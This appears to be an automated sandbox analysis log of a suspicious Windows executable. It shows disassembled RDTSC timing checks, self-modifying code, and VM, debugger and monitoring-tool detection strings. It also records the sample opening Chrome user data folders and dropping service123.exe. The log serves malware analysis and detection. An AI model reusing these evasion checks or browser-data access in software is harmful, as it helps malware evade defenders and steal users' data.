Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6F015BF second address: 6F015C4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6F015C4 second address: 6F015D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pop esi 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6F015D2 second address: 6F015D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6F015D6 second address: 6F015F0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF6D0B95BF6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6F015F0 second address: 6F01613 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, cx 0x00000006 call 00007FF6D0B6481Ah 0x0000000b pop ecx 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FF6D0B6481Ch 0x00000017 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6F01613 second address: 6F01662 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FF6D0B95BF1h 0x00000009 or si, 2AE6h 0x0000000e jmp 00007FF6D0B95BF1h 0x00000013 popfd 0x00000014 mov cx, C917h 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b leave 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007FF6D0B95BF9h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6F01662 second address: 6F01672 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF6D0B6481Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6F50DE2 second address: 6F50E67 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushfd 0x00000006 jmp 00007FF6D0B95BF7h 0x0000000b sub al, FFFFFFCEh 0x0000000e jmp 00007FF6D0B95BF9h 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 xchg eax, ebp 0x00000018 jmp 00007FF6D0B95BEEh 0x0000001d push eax 0x0000001e pushad 0x0000001f mov edx, 452CBAF4h 0x00000024 pushfd 0x00000025 jmp 00007FF6D0B95BEDh 0x0000002a and eax, 5ADC0CB6h 0x00000030 jmp 00007FF6D0B95BF1h 0x00000035 popfd 0x00000036 popad 0x00000037 xchg eax, ebp 0x00000038 push eax 0x00000039 push edx 0x0000003a pushad 0x0000003b mov bx, A53Eh 0x0000003f push ebx 0x00000040 pop eax 0x00000041 popad 0x00000042 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6F50E67 second address: 6F50E6D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6F50E6D second address: 6F50E9D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF6D0B95BEAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d pushad 0x0000000e mov eax, 70EDB3DDh 0x00000013 mov ch, B0h 0x00000015 popad 0x00000016 pop ebp 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a jmp 00007FF6D0B95BEEh 0x0000001f mov edi, esi 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6EF0725 second address: 6EF0744 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF6D0B6481Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov di, ax 0x0000000e popad 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6EF0744 second address: 6EF0748 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6EF0748 second address: 6EF074E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6EF074E second address: 6EF0787 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF6D0B95BEAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FF6D0B95BEDh 0x00000013 adc ax, F626h 0x00000018 jmp 00007FF6D0B95BF1h 0x0000001d popfd 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6EF0787 second address: 6EF078C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6EF078C second address: 6EF0792 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6EF0792 second address: 6EF0796 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6EF0796 second address: 6EF079A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6EF079A second address: 6EF07C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a jmp 00007FF6D0B64825h 0x0000000f pop ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6EF07C0 second address: 6EF07D3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF6D0B95BEFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6EF07D3 second address: 6EF07EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF6D0B64824h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6EF07EB second address: 6EF07EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6E9085E second address: 6E9088E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF6D0B64823h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FF6D0B64825h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6EE0C13 second address: 6EE0C2D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF6D0B95BF1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6EE0C2D second address: 6EE0C78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushfd 0x00000006 jmp 00007FF6D0B6481Fh 0x0000000b or cl, FFFFFFBEh 0x0000000e jmp 00007FF6D0B64829h 0x00000013 popfd 0x00000014 popad 0x00000015 push eax 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FF6D0B64823h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6EE0C78 second address: 6EE0C7E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6EC001B second address: 6EC0021 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6EC0021 second address: 6EC0025 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6EC0025 second address: 6EC004E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF6D0B6481Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FF6D0B64825h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6EC004E second address: 6EC0054 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6EC0054 second address: 6EC0058 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6EC0058 second address: 6EC0078 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FF6D0B95BF5h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6EC0078 second address: 6EC009E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FF6D0B64827h 0x00000008 pop eax 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e xchg eax, ebp 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 mov ah, bh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6EC021F second address: 6EC02D1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF6D0B95BF1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+24h], 00000000h 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007FF6D0B95BECh 0x00000018 sub cx, 4958h 0x0000001d jmp 00007FF6D0B95BEBh 0x00000022 popfd 0x00000023 jmp 00007FF6D0B95BF8h 0x00000028 popad 0x00000029 lock bts dword ptr [edi], 00000000h 0x0000002e jmp 00007FF6D0B95BF0h 0x00000033 jc 00007FF741317D90h 0x00000039 jmp 00007FF6D0B95BF0h 0x0000003e pop edi 0x0000003f pushad 0x00000040 mov al, B2h 0x00000042 mov ebx, 7E87D22Eh 0x00000047 popad 0x00000048 pop esi 0x00000049 jmp 00007FF6D0B95BF5h 0x0000004e pop ebx 0x0000004f pushad 0x00000050 movzx eax, di 0x00000053 popad 0x00000054 mov esp, ebp 0x00000056 push eax 0x00000057 push edx 0x00000058 pushad 0x00000059 mov di, 4EF2h 0x0000005d pushad 0x0000005e popad 0x0000005f popad 0x00000060 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6EC02D1 second address: 6EC02D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6EC02D7 second address: 6EC02DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6EF080B second address: 6EF0811 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6EF0811 second address: 6EF08A5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebp 0x00000009 pushad 0x0000000a mov cl, 18h 0x0000000c pushfd 0x0000000d jmp 00007FF6D0B95BF1h 0x00000012 sbb esi, 29D7DA56h 0x00000018 jmp 00007FF6D0B95BF1h 0x0000001d popfd 0x0000001e popad 0x0000001f mov dword ptr [esp], ebp 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 pushfd 0x00000026 jmp 00007FF6D0B95BF3h 0x0000002b sub esi, 371A0B8Eh 0x00000031 jmp 00007FF6D0B95BF9h 0x00000036 popfd 0x00000037 pushfd 0x00000038 jmp 00007FF6D0B95BF0h 0x0000003d xor ax, 0E08h 0x00000042 jmp 00007FF6D0B95BEBh 0x00000047 popfd 0x00000048 popad 0x00000049 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6EF08A5 second address: 6EF08AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6EF08AB second address: 6EF08AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6EF08AF second address: 6EF08D7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a jmp 00007FF6D0B64827h 0x0000000f pop ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6EF08D7 second address: 6EF08DD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6EE0B16 second address: 6EE0B2E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF6D0B64824h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6EE0B2E second address: 6EE0B32 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6EF0A7E second address: 6EF0AE2 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 2CFE595Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push edx 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FF6D0B64822h 0x00000012 or cx, 6CE8h 0x00000017 jmp 00007FF6D0B6481Bh 0x0000001c popfd 0x0000001d push esi 0x0000001e push ebx 0x0000001f pop eax 0x00000020 pop ebx 0x00000021 popad 0x00000022 mov dword ptr [esp], ebp 0x00000025 pushad 0x00000026 pushad 0x00000027 mov edx, ecx 0x00000029 mov cl, D4h 0x0000002b popad 0x0000002c jmp 00007FF6D0B6481Bh 0x00000031 popad 0x00000032 mov ebp, esp 0x00000034 push eax 0x00000035 push edx 0x00000036 jmp 00007FF6D0B64825h 0x0000003b rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6EF0AE2 second address: 6EF0B1E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF6D0B95BF1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [ebp+04h] 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FF6D0B95BECh 0x00000013 add ax, B408h 0x00000018 jmp 00007FF6D0B95BEBh 0x0000001d popfd 0x0000001e push eax 0x0000001f push edx 0x00000020 mov bx, ax 0x00000023 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6EF0B6B second address: 6EF0B70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6EF0B70 second address: 6EF0B8D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF6D0B95BF9h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6EF0B8D second address: 6EF0B91 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6F60A82 second address: 6F60AB8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF6D0B95BF1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dl, byte ptr [ebp+14h] 0x0000000c pushad 0x0000000d mov dx, cx 0x00000010 call 00007FF6D0B95BF8h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6F60AB8 second address: 6F60B95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 mov eax, dword ptr [ebp+10h] 0x00000009 jmp 00007FF6D0B64827h 0x0000000e and dl, 00000007h 0x00000011 jmp 00007FF6D0B64826h 0x00000016 test eax, eax 0x00000018 jmp 00007FF6D0B64820h 0x0000001d je 00007FF741269F05h 0x00000023 jmp 00007FF6D0B64820h 0x00000028 sub ecx, ecx 0x0000002a pushad 0x0000002b pushfd 0x0000002c jmp 00007FF6D0B64827h 0x00000031 or si, 7FCEh 0x00000036 jmp 00007FF6D0B64829h 0x0000003b popfd 0x0000003c call 00007FF6D0B64820h 0x00000041 mov cx, 3EE1h 0x00000045 pop esi 0x00000046 popad 0x00000047 inc ecx 0x00000048 jmp 00007FF6D0B6481Dh 0x0000004d shr eax, 1 0x0000004f push eax 0x00000050 push edx 0x00000051 push eax 0x00000052 push edx 0x00000053 jmp 00007FF6D0B64828h 0x00000058 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6F60B95 second address: 6F60B99 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe Special instruction interceptor: First address: 11BF990 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\u25XzKsRuY.exe Special instruction interceptor: First address: 11BFAB1 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\u25XzKsRuY.exe Special instruction interceptor: First address: 13EBA84 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\u25XzKsRuY.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\Desktop\u25XzKsRuY.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\Desktop\u25XzKsRuY.exe Window / User API: threadDelayed 2510
Source: C:\Users\user\Desktop\u25XzKsRuY.exe Window / User API: threadDelayed 1572
Source: C:\Users\user\Desktop\u25XzKsRuY.exe Window / User API: threadDelayed 711
Source: C:\Users\user\AppData\Local\Temp\service123.exe Window / User API: threadDelayed 4200
Source: C:\Users\user\AppData\Local\Temp\service123.exe Window / User API: threadDelayed 5799
Source: C:\Users\user\AppData\Local\Temp\service123.exe API coverage: 1.2 %
Source: C:\Users\user\Desktop\u25XzKsRuY.exe TID: 8072 Thread sleep count: 49 > 30
Source: C:\Users\user\Desktop\u25XzKsRuY.exe TID: 8072 Thread sleep time: -98049s >= -30000s
Source: C:\Users\user\Desktop\u25XzKsRuY.exe TID: 8080 Thread sleep count: 44 > 30
Source: C:\Users\user\Desktop\u25XzKsRuY.exe TID: 8080 Thread sleep time: -88044s >= -30000s
Source: C:\Users\user\Desktop\u25XzKsRuY.exe TID: 8168 Thread sleep time: -32000s >= -30000s
Source: C:\Users\user\Desktop\u25XzKsRuY.exe TID: 8068 Thread sleep count: 60 > 30
Source: C:\Users\user\Desktop\u25XzKsRuY.exe TID: 8068 Thread sleep time: -120060s >= -30000s
Source: C:\Users\user\Desktop\u25XzKsRuY.exe TID: 8064 Thread sleep count: 2510 > 30
Source: C:\Users\user\Desktop\u25XzKsRuY.exe TID: 8064 Thread sleep time: -5022510s >= -30000s
Source: C:\Users\user\Desktop\u25XzKsRuY.exe TID: 8052 Thread sleep count: 1572 > 30
Source: C:\Users\user\Desktop\u25XzKsRuY.exe TID: 8052 Thread sleep time: -3145572s >= -30000s
Source: C:\Users\user\Desktop\u25XzKsRuY.exe TID: 8064 Thread sleep count: 711 > 30
Source: C:\Users\user\Desktop\u25XzKsRuY.exe TID: 8064 Thread sleep time: -1422711s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\service123.exe TID: 5212 Thread sleep count: 4200 > 30
Source: C:\Users\user\AppData\Local\Temp\service123.exe TID: 5212 Thread sleep time: -420000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\service123.exe TID: 5212 Thread sleep count: 5799 > 30
Source: C:\Users\user\AppData\Local\Temp\service123.exe TID: 5212 Thread sleep time: -579900s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\service123.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\u25XzKsRuY.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\u25XzKsRuY.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\
Source: C:\Users\user\Desktop\u25XzKsRuY.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\
Source: C:\Users\user\Desktop\u25XzKsRuY.exe File opened: C:\Users\user\.ms-ad\
Source: C:\Users\user\Desktop\u25XzKsRuY.exe File opened: C:\Users\user\AppData\Local\
Source: C:\Users\user\Desktop\u25XzKsRuY.exe File opened: C:\Users\user\AppData\Local\Google\
Source: C:\Users\user\Desktop\u25XzKsRuY.exe File opened: C:\Users\user\AppData\
Source: Amcache.hve.14.dr Binary or memory string: VMware
Source: Amcache.hve.14.dr Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.14.dr Binary or memory string: vmci.syshbin
Source: Amcache.hve.14.dr Binary or memory string: VMware, Inc.
Source: Amcache.hve.14.dr Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.14.dr Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.14.dr Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.14.dr Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.14.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: u25XzKsRuY.exe, 00000000.00000003.1303473733.00000000071E0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: SYSINTERNALSNum_processorNum_ramnameallfreedriversNum_displaysresolution_xresolution_y\*recent_filesprocessesuptime_minutesC:\Windows\System32\VBox*.dll01vbox_firstSYSTEM\ControlSet001\Services\VBoxSFvbox_secondC:\USERS\PUBLIC\public_checkWINDBG.EXEdbgwireshark.exeprocmon.exex64dbg.exeida.exedbg_secdbg_thirdyadroinstalled_appsSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallSOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall%d%s\%sDisplayNameapp_nameindexCreateToolhelp32Snapshot failed.
Source: Amcache.hve.14.dr Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.14.dr Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.14.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: chrome.exe, 00000003.00000002.1716589798.0000028A464B8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: Amcache.hve.14.dr Binary or memory string: vmci.sys
Source: u25XzKsRuY.exe, 00000000.00000003.1303473733.00000000071E0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: SYSTEM\ControlSet001\Services\VBoxSF
Source: Amcache.hve.14.dr Binary or memory string: vmci.syshbin`
Source: Amcache.hve.14.dr Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.14.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.14.dr Binary or memory string: VMware-42 27 ae 88 8c 2b 21 02-a5 86 22 5b 84 51 ac f0
Source: Amcache.hve.14.dr Binary or memory string: VMware20,1
Source: Amcache.hve.14.dr Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.14.dr Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.14.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.14.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.14.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.14.dr Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.14.dr Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.14.dr Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.14.dr Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.14.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.14.dr Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: C:\Users\user\Desktop\u25XzKsRuY.exe System information queried: ModuleInformation
Source: C:\Users\user\Desktop\u25XzKsRuY.exe Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\Desktop\u25XzKsRuY.exe Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\u25XzKsRuY.exe Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\u25XzKsRuY.exe Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\u25XzKsRuY.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\u25XzKsRuY.exe Open window title or class name: procmon_window_class
